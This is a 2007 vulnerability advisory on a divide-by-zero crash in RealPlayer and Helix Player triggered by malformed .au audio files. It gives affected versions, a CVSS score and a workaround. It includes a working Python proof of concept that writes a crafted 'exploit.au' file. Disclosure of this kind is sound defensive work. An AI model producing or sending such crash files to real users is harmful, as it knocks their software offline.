RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability OS2A ID: OS2A_1010 08/21/2007 Issue Discovered 08/31/2007 Vendor Notification Class: Denial of Service Severity: High Overview: ------------- RealPlayer/Helix Player is a media player that will play popular media formats as well as organize your music and videos. Description: -------------- A Denial of Service flaw exists in RealPlayer and HelixPlayer, when a user tries to open a malformed .au file. The flaw is due to a Division by Zero error when processing a malformed AU file. An attacker must entice an unsuspecting user to open a maliciously crafted AU file. Impact: -------- Successful exploitation allows an attacker to crash a vulnerable application via a specially crafted file. (Deny the service). Affected Software(s): --------------------- Realplayer 10.1.0.3114 and prior Helixplayer Tested on : - RealPlayer-10.1.0.3114 - Realplayer-10.0.9 - Realplayer-10.0.8 on FC6, RH9, RHEL and SuSE respectively - Realplayer10-5Gold on Windows XP - HelixPlayer-1.0.6.778 on FC6 AV MP3 Player and Media Player Classic are also found to be vulnerable Affected Platform: ------------------ Microsoft Windows (All Platform) RedHat Linux Fedora Core Linux SuSE Linux Proof of Concept: ------------------ The following Python program will generate a malformed .au file import sys import os head = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01"+ "\x02\x02\x1F\x40\x00\x00\x00\x00\x00" + "\x31\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00") print "[x] RealPlayer/Helix Player/Kaboodle Player DoS" try: f = open("exploit.au",'w') except IOError, e: print "Unable to open file ", e sys.exit(0) print "[x] File successfully opened for writing." try: f.write(head) except IOError, e: print "Unable to write to file ", e sys.exit(0) print "[x] File successfully written." f.close() print "[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players." #End of program RealPlayer crashes with the following exception, Floating point exception$REALPLAYBIN "$@" CVSS Score Report: ------------------ ACCESS_VECTOR = NETWORK ACCESS_COMPLEXITY = MEDIUM AUTHENTICATION = NOT_REQUIRED CONFIDENTIALITY_IMPACT = NONE INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT = COMPLETE EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL = UNAVAILABLE REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C) CVSS Temporal Score = 6.4 Risk factor = High Reference: ----------- A similar attack was found recently against Windows Media Player, http://www.safehack.com/exp/mp/mplayer11.txt Solution/Work Around: -------------------- Do not open untrusted .au files. Credits: -------- Nagendra Kumar G, Chandan S and Arun Kethipelly of OS2A have been credited with the discovery of this vulnerability.